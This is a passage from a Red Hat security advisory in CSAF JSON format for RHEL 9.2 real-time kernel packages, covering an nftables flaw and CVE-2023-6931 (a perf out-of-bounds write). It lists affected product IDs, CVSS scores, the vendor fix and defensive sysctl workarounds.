"category": "vendor_fix",
"date": "2024-02-28T12:36:50+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1019"
},
{
"category": "workaround",
"details": "In order to trigger the issue, it requires the ability to create user/net namespaces.\n\nOn non-containerized deployments of Red Hat Enterprise Linux 8, you can disable user namespaces by setting user.max_user_namespaces to 0:\n\n# echo \"user.max_user_namespaces=0\" \u003e /etc/sysctl.d/userns.conf\n# sysctl -p /etc/sysctl.d/userns.conf\n\nOn containerized deployments, such as Red Hat OpenShift Container Platform, do not use this mitigation as the functionality is needed to be enabled.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: inactive elements in nft_pipapo_walk"
},
{
"cve": "CVE-2023-6931",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2023-11-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2252731"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel\u0027s Performance Events system component. A condition can be triggered that allows data to be written past the end or before the beginning of the intended memory buffer. This may lead to a system crash, code execution, or local privilege escalation.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event\u0027s read_size",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-6931"
},
{
"category": "external",
"summary": "RHBZ#2252731",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2252731"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-6931",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6931"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-6931",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6931"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=382c27f4ed28f803b1f1473ac2d8db0afc795a1b",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=382c27f4ed28f803b1f1473ac2d8db0afc795a1b"
}
],
"release_date": "2023-11-29T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-02-28T12:36:50+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1019"
},
{
"category": "workaround",
"details": "It is not possible to trigger this issue with the default kernel.perf_event_paranoid sysctl value 2. You may check it with:\ncat /proc/sys/kernel/perf_event_paranoid",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
